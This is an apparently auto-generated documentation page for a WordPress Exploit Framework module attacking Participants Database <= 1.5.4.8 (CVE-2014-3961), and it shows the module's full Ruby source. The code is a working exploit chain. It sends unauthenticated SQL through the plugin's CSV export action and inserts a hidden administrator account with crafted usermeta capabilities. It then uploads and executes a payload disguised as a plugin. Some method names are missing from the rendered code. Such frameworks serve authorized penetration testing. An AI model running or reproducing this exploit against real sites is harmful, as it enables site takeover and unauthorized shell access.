Class: Wpxf::Exploit::ParticipantsDatabaseV1548ShellUpload
- Includes:
- Wpxf, WordPress::Plugin
- Defined in:
- lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb
Constant Summary
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary collapse
- #check ⇒ Object
- #execute_payload ⇒ Object
- #execute_sql_query(query) ⇒ Object
- #hexified_email ⇒ Object
- #hexified_password_hash ⇒ Object
- #hexified_username ⇒ Object
-
#initialize ⇒ ParticipantsDatabaseV1548ShellUpload
constructor
A new instance of ParticipantsDatabaseV1548ShellUpload.
- #new_user_sql ⇒ Object
- #password_hash ⇒ Object
- #run ⇒ Object
- #sign_up_url ⇒ Object
- #table_name(name) ⇒ Object
- #update_user_meta(key, value) ⇒ Object
- #user_id ⇒ Object
- #user_meta_sql(key, value) ⇒ Object
Methods included from WordPress::Plugin
#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
#authenticate_with_wordpress, #requires_authentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ ParticipantsDatabaseV1548ShellUpload
Returns a new instance of ParticipantsDatabaseV1548ShellUpload.
7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 |
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 7 def initialize super update_info( name: 'Participants Database <= 1.5.4.8 Shell Upload', desc: %( In versions <= 1.5.4.8 of the Participants Database, anonymous users are able to execute arbitrary SQL statements. This module utilises this vulnerability to create a new admin user and upload a payload masked as a plugin. ), author: [ 'Yarubo Research Team', # Vulnerability discovery 'rastating' # WPXF module ], references: [ ['CVE', '2014-3961'], ['WPVDB', '7247'], ['EDB', '33613'] ], date: 'Aug 01 2014' ) ([ StringOption.new( name: 'sign_up_path', desc: 'The relative path of the Participants Database sign up page', required: true ), StringOption.new( name: 'wp_prefix', desc: 'The database table prefix. Default: wp_', required: true, default: 'wp_' ), IntegerOption.new( name: 'user_id', desc: 'The ID number to use for the new admin account', required: true, default: (60_000..90_000).to_a.sample ), StringOption.new( name: 'username', desc: 'The username to use for the new admin account', required: true, default: Utility::Text.rand_alpha(6) ), StringOption.new( name: 'password', desc: 'The password to use for the new admin account', required: true, default: Utility::Text.rand_alpha(6) ), StringOption.new( name: 'email', desc: 'The e-mail address to use for the new admin account', required: true, default: Utility::Text.rand_email ) ]) end |
Instance Method Details
#check ⇒ Object
69 70 71 |
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 69 def check check_plugin_version_from_readme('participants-database', '1.5.4.9') end |
#execute_payload ⇒ Object
134 135 136 137 138 139 |
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 134 def execute_payload emit_info 'Uploading the payload...' = authenticate_with_wordpress(datastore['username'], datastore['password']) res = upload_payload_as_plugin_and_execute(Utility::Text.rand_alpha(6), Utility::Text.rand_alpha(6), ) res&.code != 404 end |
#execute_sql_query(query) ⇒ Object
118 119 120 121 122 123 124 125 126 127 128 |
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 118 def execute_sql_query(query) builder = Utility::BodyBuilder.new builder.add_field('action', 'output CSV') builder.add_field('subsource', 'participants-database') builder.add_field('CSV_type', 'participant list') builder.add_field('query', query) builder.create do |body| execute_post_request(url: sign_up_url, body: body) end end |
#hexified_email ⇒ Object
93 94 95 |
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 93 def hexified_email "0x#{Utility::Text.hexify_string(datastore['email'])}" end |
#hexified_password_hash ⇒ Object
89 90 91 |
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 89 def hexified_password_hash "0x#{Utility::Text.hexify_string(password_hash)}" end |
#hexified_username ⇒ Object
81 82 83 |
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 81 def hexified_username "0x#{Utility::Text.hexify_string(datastore['username'])}" end |
#new_user_sql ⇒ Object
101 102 103 104 105 106 107 108 |
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 101 def new_user_sql [ "insert into #{table_name('users')}", '(ID, user_login, user_pass, user_nicename, user_email, user_status, display_name)', 'values', "(#{user_id}, #{hexified_username}, #{hexified_password_hash}, #{hexified_username}, #{hexified_email}, 0, #{hexified_username});" ].join(' ') end |
#password_hash ⇒ Object
85 86 87 |
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 85 def password_hash Utility::Text.md5(datastore['password']) end |
#run ⇒ Object
141 142 143 144 145 146 147 148 149 150 151 152 |
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 141 def run return false unless super emit_info 'Creating a new user...' execute_sql_query(new_user_sql) emit_info 'Elevating user privileges...' ('wp_user_level', '10') ('wp_capabilities', 'a:1:{s:13:"administrator";b:1;}') execute_payload end |
#sign_up_url ⇒ Object
73 74 75 |
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 73 def sign_up_url normalize_uri(full_uri, datastore['sign_up_path']) end |
#table_name(name) ⇒ Object
97 98 99 |
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 97 def table_name(name) "#{datastore['wp_prefix']}#{name}" end |
#update_user_meta(key, value) ⇒ Object
130 131 132 |
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 130 def (key, value) execute_sql_query((key, value)) end |
#user_id ⇒ Object
77 78 79 |
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 77 def user_id normalized_option_value('user_id') end |
#user_meta_sql(key, value) ⇒ Object
110 111 112 113 114 115 116 |
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 110 def (key, value) [ "insert into #{table_name('usermeta')}", '(user_id, meta_key, meta_value) values', "(#{user_id}, 0x#{Utility::Text.hexify_string(key)}, 0x#{Utility::Text.hexify_string(value)})" ].join(' ') end |